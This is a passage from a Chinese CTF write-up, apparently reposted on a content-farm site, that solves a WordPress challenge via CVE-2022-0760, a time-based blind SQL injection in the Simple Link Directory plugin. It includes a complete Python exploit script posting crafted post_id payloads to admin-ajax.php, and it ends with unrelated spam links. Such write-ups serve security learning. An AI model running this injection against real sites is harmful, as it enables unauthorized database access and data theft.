当前位置: 首页 > news >正文

网站开发a — ajax微信公众号前端开发教程

news 2025/11/14 16:48:07
网站开发a — ajax,微信公众号前端开发教程,上海建设网站公司哪家好,wordpress如何配置百度云cdnCVE-2022-0760 NSS [HNCTF 2022 WEEK2]ohmywordpress 【CVE-2022-0760】 题目描述#xff1a;flag在数据库里面。 开题#xff1a; 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面#xff0c;有一个搜索框。 F12看看network。 又出现了这个Wor…CVE-2022-0760 NSS [HNCTF 2022 WEEK2]ohmywordpress 【CVE-2022-0760】 题目描述flag在数据库里面。 开题 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面有一个搜索框。 F12看看network。 又出现了这个WordPress从源码中看出版本是6.0.2。 网上一番搜索找到一个cveCVE-2022-0760。当WordPress的插件Simple Link Directory版本 7.7.2时候存在时间盲注。 查看源码这里确实运用的这个插件但是看不到版本。 估计就是这个CVE那就直接上盲注脚本。 import requests import timeurl http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.phpresult for i in range(1, 100):length len(result)for o in range(32, 128):data {action: qcopd_upvote_action,# post_id: f(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1)){o},sleep(3),0))enz),# post_id: f(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasubstr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1)){o},sleep(3),0))enz),post_id: f(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1)){o},sleep(3),0))enz),}time1 time.time()res requests.post(url, datadata)time2 time.time()# print(time2 - time1)# exit()if time2 - time1 3:result chr(o)print(result)breakif len(result) length:break为什么这样写脚本漏洞利用在下面文章里面能找到。 参考文章 NSFOCUS绿盟科技 [Simple Link Directory 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)](
http://www.zqtcl.cn/news/645855/

相关文章:

  • 镇江网站排名优化费用app软件开发平台游戏
  • 襄阳网站建设xytzg南通网站建设top
  • 有没有做产品团购的网站2d动画制作软件
  • 成都网站排名生客seo杭州专业网站制作设计
  • 阿里云 企业 网站四平市网站建设
  • 政务门户网站建设信息奇人网站
  • 打开网站弹出广告代码如何建设网站方便后期维护
  • 海淀网站建设龙岩做网站用什么cms 知乎
  • 网站托管费用多少免费一卡二卡三
  • 长沙做网站品牌中信建设官网站首页
  • 网站空白页黑链聊城网站建设代理商
  • 微信上打开连接的网站怎么做在网上可以做宣传的有那些网站
  • 公司在选择网站时应考虑什么问题溧阳 招网站开发
  • 兴宁电子商务网站建设农村电子商务网站建设方案
  • 张北县网站建设网站设计师加油站
  • 网站建设车成本网站开发网络结构图
  • 建设部职称网站宝山网站制作
  • 太仓网站建设哪家好58同城找工作
  • 一键网站制作机关网站建设建议
  • 快站公众号工具台州网站制作系统分析怎么写
  • 品牌网站制作方案如何写推广软文
  • o2o营销seo薪酬如何
  • 网站开发公司 网站空间推广网站制作
  • 鞍山网站制作小程序WordPress网盘下载插件
  • 保山市建设厅官方网站郑州建设信息网站
  • clh网站建设公司h5网站源代码
  • 做装修的网站怎么做好服装市场调网站建设的目的
  • 佛山网站建站电子工程网名又知道你是做工程
  • 桐乡网站二次开发商城购物网站建设
  • 大连微网站制作公司网页多钱